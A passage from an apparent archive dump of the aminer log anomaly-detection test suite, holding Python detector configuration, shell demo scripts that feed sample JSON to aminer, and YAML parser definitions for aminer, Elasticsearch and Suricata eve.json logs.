aminer.analysis.EventSequenceDetector import EventSequenceDetector esd = EventSequenceDetector(analysis_context.aminer_config, anomaly_event_handlers, ['/model/ParsingME'], ignore_list=[ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l', '/model/Random', '/model/RandomTime', '/model/DailyCron']) analysis_context.register_component(esd, component_name="EventSequenceDetector") atom_filter.add_handler(esd) from aminer.analysis.MatchFilter import MatchFilter match_filter = MatchFilter(analysis_context.aminer_config, ['/model/Random'], anomaly_event_handlers, target_value_list=[ 1, 10, 100], output_logline=True) analysis_context.register_component(match_filter, component_name="MatchFilter") atom_filter.add_handler(match_filter) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function, output_logline=True) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) import re ip_match_action = Rules.EventGenerationMatchAction( "Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers) vdmt = Rules.ValueDependentModuloTimeMatchRule("vdmtmr", 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3]) mt = Rules.ModuloTimeMatchRule("mtmr", 3, 0, 3, None) time_allowlist_rules = [ Rules.AndMatchRule([ Rules.ParallelMatchRule([ Rules.ValueDependentDelegatedMatchRule([ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], { (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt}, mt), Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action), Rules.DebugHistoryMatchRule(debug_match_result=True) ]), # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])), Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)), Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$"))) ]) ] time_allowlist_violation_detector = AllowlistViolationDetector( analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist") atom_filter.add_handler(time_allowlist_violation_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, [ '/model/Random'], 100, 10, output_logline=True) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, output_logline=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector(analysis_context.aminer_config, [ '/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=[ '/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filter.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5, output_logline=True) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=10000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/000077500000000000000000000000001500476301700256575ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/aminerJsonInputDemo.sh000077500000000000000000000030271500476301700321520ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh LOGFILE=/tmp/syslog sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/json-input-demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi # start json in same line read -r -d '' VAR << END {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END echo "$VAR" >> $LOGFILE # start json in new line read -r -d '' VAR << END { "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } } } END # start everything in new line read -r -d '' VAR << END { "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ { "value": "New", "onclick": "CreateNewDoc()" }, { "value": "Open", "onclick": "OpenDoc()"}, { "value": "Close", "onclick": "CloseDoc()"} ] } } } END echo "$VAR" >> $LOGFILE runAminerUntilEnd "sudo aminer --config $FILE" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$FILE" exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-aminer-demo.yml000066400000000000000000000101121500476301700315410ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/aminer.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: component_id type: DecimalIntegerValueModelElement name: 'component_id' - id: component_type type: FixedWordlistDataModelElement name: 'component_type' args: - 'AllowlistViolationDetector' - 'EnhancedNewMatchPathValueComboDetector' - 'EventCorrelationDetector' - 'EventFrequencyDetector' - 'EventSequenceDetector' - 'EventTypeDetector' - 'HistogramAnalysis' - 'PathDependentHistogramAnalysis' - 'MatchFilter' - 'MatchValueAverageChangeDetector' - 'MatchValueStreamWriter' - 'MissingMatchPathValueDetector' - 'MissingMatchPathListValueDetector' - 'NewMatchIdValueComboDetector' - 'NewMatchPathDetector' - 'NewMatchPathValueComboDetector' - 'NewMatchPathValueDetector' - 'ParserCount' - 'TimeCorrelationDetector' - 'TimeCorrelationViolationDetector' - 'TimestampsUnsortedDetector' - 'VariableCorrelationDetector' - 'VariableTypeDetector' - id: component_name type: VariableByteDataModelElement name: 'component_name' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' - id: message type: VariableByteDataModelElement name: 'message' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.()' - id: persistence_name type: FixedWordlistDataModelElement name: 'persistence_name' args: - 'Default' - 'suricata_fileinfo' - 'syslog_disconnected_user' - 'exim_no_host_name_found_ip' - 'suricata_err' - id: atom_paths type: VariableByteDataModelElement name: 'atom_paths' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-/' - id: affected_values type: AnyByteDataModelElement name: 'affected_values' - id: timestamps_no_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s' - id: timestamps_with_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s.%f' - id: timestamps type: FirstMatchModelElement name: 'timestamps' args: - timestamps_with_milliseconds - timestamps_no_milliseconds - id: log_lines_count type: DecimalIntegerValueModelElement name: 'log_lines_count' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: AnalysisComponent: AnalysisComponentIdentifier: component_id AnalysisComponentType: component_type AnalysisComponentName: component_name Message: message PersistenceFileName: persistence_name AffectedLogAtomPaths: - atom_paths _AffectedLogAtomValues: - affected_values ParsedLogAtom: 'ALLOW_ALL' LogData: RawLogData: - 'ALLOW_ALL' Timestamps: - timestamps LogLinesCount: log_lines_count Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-demo.sh000077500000000000000000000015211500476301700301100ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Demo started.." echo "" CFG_PATH=$1 OUT=$2 if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" exit 1 fi FOUND=false LOGFILE="" while read p; do if [[ $FOUND = true ]]; then LOGFILE="$p" break fi if [[ "$p" == "LogResourceList:" ]]; then FOUND=true fi done < $CFG_PATH IFS="'" read -ra ADDR <<< "$LOGFILE" LOGFILE="${ADDR[1]:7}" # remove the file:// prefix. runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-elastic-demo.yml000066400000000000000000000123021500476301700317150ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/elastic.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: _scroll_id type: Base64StringModelElement name: '_scroll_id' - id: took type: DecimalIntegerValueModelElement name: 'took' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'timed_out' args: - 'true' - 'false' - id: total type: DecimalIntegerValueModelElement name: 'total' - id: successful type: DecimalIntegerValueModelElement name: 'successful' - id: skipped type: DecimalIntegerValueModelElement name: 'skipped' - id: failed type: DecimalIntegerValueModelElement name: 'failed' - id: value type: DecimalIntegerValueModelElement name: 'value' - id: relation type: FixedDataModelElement name: 'relation' args: 'eq' - id: max_score type: DecimalFloatValueModelElement name: 'max_score' - id: _index type: DateTimeModelElement name: '_index' date_format: 'aminer-statusinfo-%Y.%m.%d' - id: _type type: FixedDataModelElement name: '_type' args: '_doc' - id: _id type: VariableByteDataModelElement name: '_id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_' - id: _score type: DecimalFloatValueModelElement name: '_score' - id: FromTime type: DecimalFloatValueModelElement name: 'FromTime' exponent_type: 'mandatory' - id: /parser/model/php type: DecimalIntegerValueModelElement name: '/parser/model/php' - id: /parser/model/event_type_str type: DecimalIntegerValueModelElement name: '/parser/model/event_type_str' - id: /parser/model/type_str type: DecimalIntegerValueModelElement name: '/parser/model/type_str' - id: /parser/model/classification type: DecimalIntegerValueModelElement name: '/parser/model/classification' - id: /parser/model/status_code type: DecimalIntegerValueModelElement name: '/parser/model/status_code' - id: /parser/model/host type: DecimalIntegerValueModelElement name: '/parser/model/host' - id: /parser/model/sp type: DecimalIntegerValueModelElement name: '/parser/model/sp' - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: ToTime type: DecimalFloatValueModelElement name: 'ToTime' exponent_type: 'mandatory' - id: fromtimestamp type: DateTimeModelElement name: 'fromtimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: totimestamp type: DateTimeModelElement name: 'totimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: version type: FixedDataModelElement name: 'version' args: '1' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: _scroll_id: _scroll_id took: took timed_out: bool_wordlist terminated_early: bool_wordlist _shards: total: total successful: successful skipped: skipped failed: failed hits: total: value: value relation: relation max_score: max_score hits: - _index: _index _type: _type _id: _id _score: _score _source: FromTime: FromTime StatusInfo: /parser/model/php: /parser/model/php /parser/model/event_type_str: /parser/model/event_type_str /parser/model/type_str: /parser/model/type_str /parser/model/classification: /parser/model/classification /parser/model/status_code: /parser/model/status_code /parser/model/host: /parser/model/host /parser/model/sp: /parser/model/sp timestamp: timestamp ToTime: ToTime fromtimestamp: fromtimestamp totimestamp: totimestamp version: version Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json-eve-demo.yml000066400000000000000000000613441500476301700310620ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/eve.json' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: _flow_id type: DecimalIntegerValueModelElement name: '_flow_id' - id: _in_iface type: FixedDataModelElement name: '_in_iface' args: 'eth0' - id: event_type type: FixedWordlistDataModelElement name: 'event_type' args: - 'dns' - 'http' - 'fileinfo' - 'stats' - 'flow' - 'alert' - 'tls' - id: ip_ipv4 type: IpAddressDataModelElement name: 'ipv4' - id: ip_ipv6 type: VariableByteDataModelElement name: 'ipv6' args: 'abcdefABCDEF0123456789:' - id: _src_ip type: FirstMatchModelElement name: '_src_ip' args: - ip_ipv4 - ip_ipv6 - id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: FirstMatchModelElement name: '_dest_ip' args: - ip_ipv4 - ip_ipv6 - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: '_proto' args: - 'UDP' - 'TCP' - 'IPv6-ICMP' - id: _icmp_type type: DecimalIntegerValueModelElement name: '_icmp_type' - id: _icmp_code type: DecimalIntegerValueModelElement name: '_icmp_code' - id: type type: FixedWordlistDataModelElement name: 'type' args: - 'answer' - 'query' - id: id type: DecimalIntegerValueModelElement name: 'id' - id: _rcode type: FixedDataModelElement name: '_rcode' args: 'NXDOMAIN' - id: rrname_ip_lower type: DelimitedDataModelElement name: 'rrname_ip_lower' delimiter: '.in-addr.arpa' - id: rrname_addr_lower type: FixedDataModelElement name: 'rrname_addr_lower' args: '.in-addr.arpa' - id: rrname_lower type: SequenceModelElement name: 'rrname' args: - rrname_ip_lower - rrname_addr_lower - id: rrname_ip_upper type: DelimitedDataModelElement name: 'rrname_ip_upper' delimiter: '.IN-ADDR.ARPA' - id: rrname_addr_upper type: FixedDataModelElement name: 'rrname_addr_upper' args: '.IN-ADDR.ARPA' - id: rrname_upper type: SequenceModelElement name: 'rrname' args: - rrname_ip_upper - rrname_addr_upper - id: rrname type: FirstMatchModelElement name: 'rrname' args: - rrname_lower - rrname_upper - id: _rrtype type: FixedWordlistDataModelElement name: '_rrtype' args: - 'SOA' - 'PTR' - id: _ttl type: DecimalIntegerValueModelElement name: '_ttl' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: hostname type: FixedDataModelElement name: 'hostname' args: 'mail.spiral.com' - id: url type: VariableByteDataModelElement name: 'url' args: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.;&=+$,/?%#\ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0' - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36' - id: _http_content_type type: FixedWordlistDataModelElement name: '_http_content_type' args: - 'text/html' - 'image/png' - 'application/javascript' - 'text/css' - 'image/vnd.microsoft.icon' - 'application/json' - 'image/gif' - 'audio/x-wav' - id: http_refer_base_url type: FixedDataModelElement name: 'http_refer_base_url' args: 'http://mail.spiral.com/' - id: optional_http_refer_base_url type: OptionalMatchModelElement name: 'optional_http_refer_base_url' args: http_refer_base_url - id: _http_refer type: SequenceModelElement name: '_http_refer' args: - http_refer_base_url - url - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - 'POST' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: _status type: DecimalIntegerValueModelElement name: '_status' - id: _redirect type: SequenceModelElement name: '_redirect' args: - optional_http_refer_base_url - url - id: length type: DecimalIntegerValueModelElement name: 'length' - id: _app_proto type: FixedWordlistDataModelElement name: '_app_proto' args: - 'http' - 'failed' - 'dns' - 'tls' - id: _app_proto_tc type: FixedDataModelElement name: '_app_proto_tc' args: 'http' - id: file_state type: FixedWordlistDataModelElement name: 'state' args: - 'CLOSED' - 'TRUNCATED' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: size type: DecimalIntegerValueModelElement name: 'size' - id: pkts_toserver type: DecimalIntegerValueModelElement name: 'pkts_toserver' - id: pkts_toclient type: DecimalIntegerValueModelElement name: 'pkts_toclient' - id: bytes_toserver type: DecimalIntegerValueModelElement name: 'bytes_toserver' - id: bytes_toclient type: DecimalIntegerValueModelElement name: 'bytes_toclient' - id: start type: DateTimeModelElement name: 'start' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: end type: DateTimeModelElement name: 'end' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: age type: DecimalIntegerValueModelElement name: 'age' - id: conn_state type: FixedWordlistDataModelElement name: 'state' args: - 'established' - 'closed' - 'fin_wait2' - 'new' - id: reason type: FixedWordlistDataModelElement name: 'reason' args: - 'timeout' - id: uptime type: DecimalIntegerValueModelElement name: 'uptime' - id: kernel_packets type: DecimalIntegerValueModelElement name: 'kernel_packets' - id: kernel_drops type: DecimalIntegerValueModelElement name: 'kernel_drops' - id: pkts type: DecimalIntegerValueModelElement name: 'pkts' - id: bytes type: DecimalIntegerValueModelElement name: 'bytes' - id: invalid type: DecimalIntegerValueModelElement name: 'invalid' - id: ipv4 type: DecimalIntegerValueModelElement name: 'ipv4' - id: ipv6 type: DecimalIntegerValueModelElement name: 'ipv6' - id: ethernet type: DecimalIntegerValueModelElement name: 'ethernet' - id: raw type: DecimalIntegerValueModelElement name: 'raw' - id: null_counts type: DecimalIntegerValueModelElement name: 'null' - id: sll type: DecimalIntegerValueModelElement name: 'sll' - id: tcp type: DecimalIntegerValueModelElement name: 'tcp' - id: udp type: DecimalIntegerValueModelElement name: 'udp' - id: sctp type: DecimalIntegerValueModelElement name: 'sctp' - id: icmpv4 type: DecimalIntegerValueModelElement name: 'icmpv4' - id: icmpv6 type: DecimalIntegerValueModelElement name: 'icmpv6' - id: ppp type: DecimalIntegerValueModelElement name: 'ppp' - id: pppoe type: DecimalIntegerValueModelElement name: 'pppoe' - id: gre type: DecimalIntegerValueModelElement name: 'gre' - id: vlan type: DecimalIntegerValueModelElement name: 'vlan' - id: vlan_qinq type: DecimalIntegerValueModelElement name: 'vlan_qinq' - id: teredo type: DecimalIntegerValueModelElement name: 'teredo' - id: ipv4_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv4_in_ipv6' - id: ipv6_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv6_in_ipv6' - id: mpls type: DecimalIntegerValueModelElement name: 'mpls' - id: avg_pkt_size type: DecimalIntegerValueModelElement name: 'avg_pkt_size' - id: max_pkt_size type: DecimalIntegerValueModelElement name: 'max_pkt_size' - id: erspan type: DecimalIntegerValueModelElement name: 'erspan' - id: invalid_ip_version type: DecimalIntegerValueModelElement name: 'invalid_ip_version' - id: pkt_too_small type: DecimalIntegerValueModelElement name: 'pkt_too_small' - id: unsupported_type type: DecimalIntegerValueModelElement name: 'unsupported_type' - id: memcap type: DecimalIntegerValueModelElement name: 'memcap' - id: spare type: DecimalIntegerValueModelElement name: 'spare' - id: emerg_mode_entered type: DecimalIntegerValueModelElement name: 'emerg_mode_entered' - id: emerg_mode_over type: DecimalIntegerValueModelElement name: 'emerg_mode_over' - id: tcp_reuse type: DecimalIntegerValueModelElement name: 'tcp_reuse' - id: memuse type: DecimalIntegerValueModelElement name: 'memuse' - id: fragments type: DecimalIntegerValueModelElement name: 'fragments' - id: reassembled type: DecimalIntegerValueModelElement name: 'reassembled' - id: timeouts type: DecimalIntegerValueModelElement name: 'timeouts' - id: max_frag_hits type: DecimalIntegerValueModelElement name: 'max_frag_hits' - id: sessions type: DecimalIntegerValueModelElement name: 'sessions' - id: ssn_memcap_drop type: DecimalIntegerValueModelElement name: 'ssn_memcap_drop' - id: pseudo type: DecimalIntegerValueModelElement name: 'pseudo' - id: pseudo_failed type: DecimalIntegerValueModelElement name: 'pseudo_failed' - id: invalid_checksum type: DecimalIntegerValueModelElement name: 'invalid_checksum' - id: no_flow type: DecimalIntegerValueModelElement name: 'no_flow' - id: syn type: DecimalIntegerValueModelElement name: 'syn' - id: synack type: DecimalIntegerValueModelElement name: 'synack' - id: rst type: DecimalIntegerValueModelElement name: 'rst' - id: segment_memcap_drop type: DecimalIntegerValueModelElement name: 'segment_memcap_drop' - id: stream_depth_reached type: DecimalIntegerValueModelElement name: 'stream_depth_reached' - id: reassembly_gap type: DecimalIntegerValueModelElement name: 'reassembly_gap' - id: reassembly_memuse type: DecimalIntegerValueModelElement name: 'reassembly_memuse' - id: alert type: DecimalIntegerValueModelElement name: 'alert' - id: http type: DecimalIntegerValueModelElement name: 'http' - id: ftp type: DecimalIntegerValueModelElement name: 'ftp' - id: smtp type: DecimalIntegerValueModelElement name: 'smtp' - id: tls type: DecimalIntegerValueModelElement name: 'tls' - id: ssh type: DecimalIntegerValueModelElement name: 'ssh' - id: imap type: DecimalIntegerValueModelElement name: 'imap' - id: msn type: DecimalIntegerValueModelElement name: 'msn' - id: smb type: DecimalIntegerValueModelElement name: 'smb' - id: dcerpc_tcp type: DecimalIntegerValueModelElement name: 'dcerpc_tcp' - id: dns_tcp type: DecimalIntegerValueModelElement name: 'dns_tcp' - id: failed_tcp type: DecimalIntegerValueModelElement name: 'failed_tcp' - id: dcerpc_udp type: DecimalIntegerValueModelElement name: 'dcerpc_udp' - id: dns_udp type: DecimalIntegerValueModelElement name: 'dns_udp' - id: failed_udp type: DecimalIntegerValueModelElement name: 'failed_udp' - id: closed_pruned type: DecimalIntegerValueModelElement name: 'closed_pruned' - id: new_pruned type: DecimalIntegerValueModelElement name: 'new_pruned' - id: est_pruned type: DecimalIntegerValueModelElement name: 'est_pruned' - id: bypassed_pruned type: DecimalIntegerValueModelElement name: 'bypassed_pruned' - id: flows_checked type: DecimalIntegerValueModelElement name: 'flows_checked' - id: flows_notimeout type: DecimalIntegerValueModelElement name: 'flows_notimeout' - id: flows_timeout type: DecimalIntegerValueModelElement name: 'flows_timeout' - id: flows_timeout_inuse type: DecimalIntegerValueModelElement name: 'flows_timeout_inuse' - id: flows_removed type: DecimalIntegerValueModelElement name: 'flows_removed' - id: rows_checked type: DecimalIntegerValueModelElement name: 'rows_checked' - id: rows_skipped type: DecimalIntegerValueModelElement name: 'rows_skipped' - id: rows_empty type: DecimalIntegerValueModelElement name: 'rows_empty' - id: rows_busy type: DecimalIntegerValueModelElement name: 'rows_busy' - id: rows_maxlen type: DecimalIntegerValueModelElement name: 'rows_maxlen' - id: memcap_state type: DecimalIntegerValueModelElement name: 'memcap_state' - id: memcap_global type: DecimalIntegerValueModelElement name: 'memcap_global' - id: tcp_flags type: FixedWordlistDataModelElement name: 'tcp_flags' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_ts type: FixedWordlistDataModelElement name: 'tcp_flags_ts' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: tcp_flags_tc type: FixedWordlistDataModelElement name: 'tcp_flags_tc' args: - '1b' - '1f' - '1a' - '17' - '13' - '16' - '12' - '06' - id: action type: FixedWordlistDataModelElement name: 'action' args: - 'allowed' - id: gid type: DecimalIntegerValueModelElement name: 'gid' - id: signature_id type: DecimalIntegerValueModelElement name: 'signature_id' - id: rev type: 